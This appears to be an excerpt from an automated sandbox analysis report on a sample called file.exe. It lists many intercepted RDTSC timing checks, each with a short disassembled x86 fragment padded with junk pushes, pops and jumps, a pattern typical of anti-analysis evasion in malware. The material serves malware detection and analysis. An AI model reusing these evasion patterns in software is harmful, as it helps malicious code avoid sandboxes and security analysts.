                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60B1B3 second address: 60B1D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F239852C062h 0x00000010 jo 00007F239852C056h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 609A06 second address: 609A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2398D03469h 0x0000000a jc 00007F2398D0345Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 609A2C second address: 609A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F239852C05Bh 0x0000000d jl 00007F239852C056h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 609A45 second address: 609A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60F180 second address: 60F186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6127B5 second address: 6127B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CF717 second address: 5CF790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F239852C06Dh 0x0000000c jmp 00007F239852C067h 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F239852C05Fh 0x00000018 nop 0x00000019 add dword ptr [ebp+122DB8A1h], edx 0x0000001f mov dx, 3C23h 0x00000023 lea eax, dword ptr [ebp+124914E0h] 0x00000029 pushad 0x0000002a push ebx 0x0000002b jl 00007F239852C056h 0x00000031 pop esi 0x00000032 mov esi, dword ptr [ebp+122D37E5h] 0x00000038 popad 0x00000039 mov cl, D4h 0x0000003b nop 0x0000003c push edi 0x0000003d pushad 0x0000003e jmp 00007F239852C05Ch 0x00000043 jmp 00007F239852C05Bh 0x00000048 popad 0x00000049 pop edi 0x0000004a push eax 0x0000004b push ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f pop eax 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CF790 second address: 5CF794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CF794 second address: 5AA651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 call dword ptr [ebp+122D1CE8h] 0x0000000e pushad 0x0000000f jmp 00007F239852C05Ah 0x00000014 jg 00007F239852C062h 0x0000001a pushad 0x0000001b js 00007F239852C056h 0x00000021 jmp 00007F239852C064h 0x00000026 popad 0x00000027 popad 0x00000028 pushad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CFEA8 second address: 5CFEE3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], esi 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F2398D03458h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push eax 0x00000029 jc 00007F2398D0345Eh 0x0000002f push edi 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D050F second address: 5D0555 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ecx, edx 0x0000000e push 0000001Eh 0x00000010 mov dword ptr [ebp+122D1BE8h], esi 0x00000016 sub dword ptr [ebp+122D275Eh], edx 0x0000001c nop 0x0000001d jmp 00007F239852C05Dh 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jno 00007F239852C05Ch 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D0823 second address: 5D0827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D08C1 second address: 5D08C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D08C5 second address: 5D08CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 612BD1 second address: 612BD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 612BD6 second address: 612BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jmp 00007F2398D03469h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61301C second address: 613020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 613020 second address: 61302C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 615796 second address: 61579A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61579A second address: 6157C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2398D03456h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F2398D0345Fh 0x00000012 jo 00007F2398D03456h 0x00000018 popad 0x00000019 pop ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6157C3 second address: 6157C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6157C9 second address: 6157DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6157DE second address: 6157E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6157E2 second address: 615816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2398D03465h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 618C5B second address: 618C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F239852C056h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 618C69 second address: 618C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 618C6D second address: 618C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C05Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 618C7F second address: 618C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618C87 second address: 618C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581024 second address: 58105A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 jmp 00007F2398D03466h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2398D0345Eh 0x00000014 jbe 00007F2398D03458h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618409 second address: 618451 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F239852C060h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F239852C05Ch 0x00000011 jbe 00007F239852C056h 0x00000017 pop esi 0x00000018 jmp 00007F239852C05Dh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 jno 00007F239852C056h 0x00000027 ja 00007F239852C056h 0x0000002d pop eax 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618451 second address: 618464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618464 second address: 61846A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6185A0 second address: 6185B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D03461h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6185B5 second address: 6185BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6185BD second address: 6185C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6185C5 second address: 618601 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F239852C056h 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F239852C056h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007F239852C05Ah 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 jmp 00007F239852C064h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618601 second address: 618621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2398D03467h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618621 second address: 618650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F239852C05Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F239852C061h 0x00000011 je 00007F239852C056h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6187AF second address: 6187BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F2398D03456h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6187BB second address: 6187BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6187BF second address: 6187DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D03463h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61894D second address: 618953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618953 second address: 618957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618957 second address: 618982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C066h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F239852C05Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F6C4 second address: 61F6CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F6CB second address: 61F6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F6D1 second address: 61F6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F2398D03456h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E16F second address: 61E18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F239852C068h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E18D second address: 61E1B8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007F2398D03460h 0x00000011 ja 00007F2398D03458h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push esi 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E495 second address: 61E4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C065h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E5F0 second address: 61E603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2398D0345Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E603 second address: 61E607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D032E second address: 5D0338 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2398D0345Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E8CF second address: 61E8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E8D4 second address: 61E8EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2398D03463h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C2D second address: 622C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C31 second address: 622C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C37 second address: 622C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C3D second address: 622C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2398D0345Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622EBA second address: 622EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622EC0 second address: 622ED2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F2398D0345Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626AB1 second address: 626AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626AB5 second address: 626ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626ABB second address: 626AC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626AC0 second address: 626AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626C35 second address: 626C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F239852C056h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F239852C065h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626C59 second address: 626C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2398D0345Bh 0x0000000f push edi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F2398D0345Ah 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626C7C second address: 626C81 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CBE0 second address: 62CBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CBE4 second address: 62CBFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F239852C05Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CBFD second address: 62CC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007F2398D0345Ch 0x0000000c jnl 00007F2398D03456h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC12 second address: 62CC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F239852C056h 0x0000000a popad 0x0000000b jmp 00007F239852C05Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC2E second address: 62CC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC32 second address: 62CC36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D4D8 second address: 62D516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F2398D03463h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c jmp 00007F2398D03464h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D516 second address: 62D51A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D818 second address: 62D81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D81F second address: 62D824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D824 second address: 62D82A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62DE15 second address: 62DE65 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F239852C05Ch 0x0000000e jne 00007F239852C056h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007F239852C05Ch 0x0000001d pushad 0x0000001e jmp 00007F239852C060h 0x00000023 jmp 00007F239852C069h 0x00000028 push edx 0x00000029 pop edx 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E68A second address: 62E693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E693 second address: 62E6AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F239852C065h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6343D2 second address: 6343E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63746F second address: 637473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637473 second address: 637479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637479 second address: 637495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C068h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637794 second address: 6377C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03464h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2398D03464h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637955 second address: 63796B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C060h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637D9D second address: 637DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D03463h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63800D second address: 638022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C05Dh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638022 second address: 638028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641AD8 second address: 641AEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F239852C056h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641AEA second address: 641AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
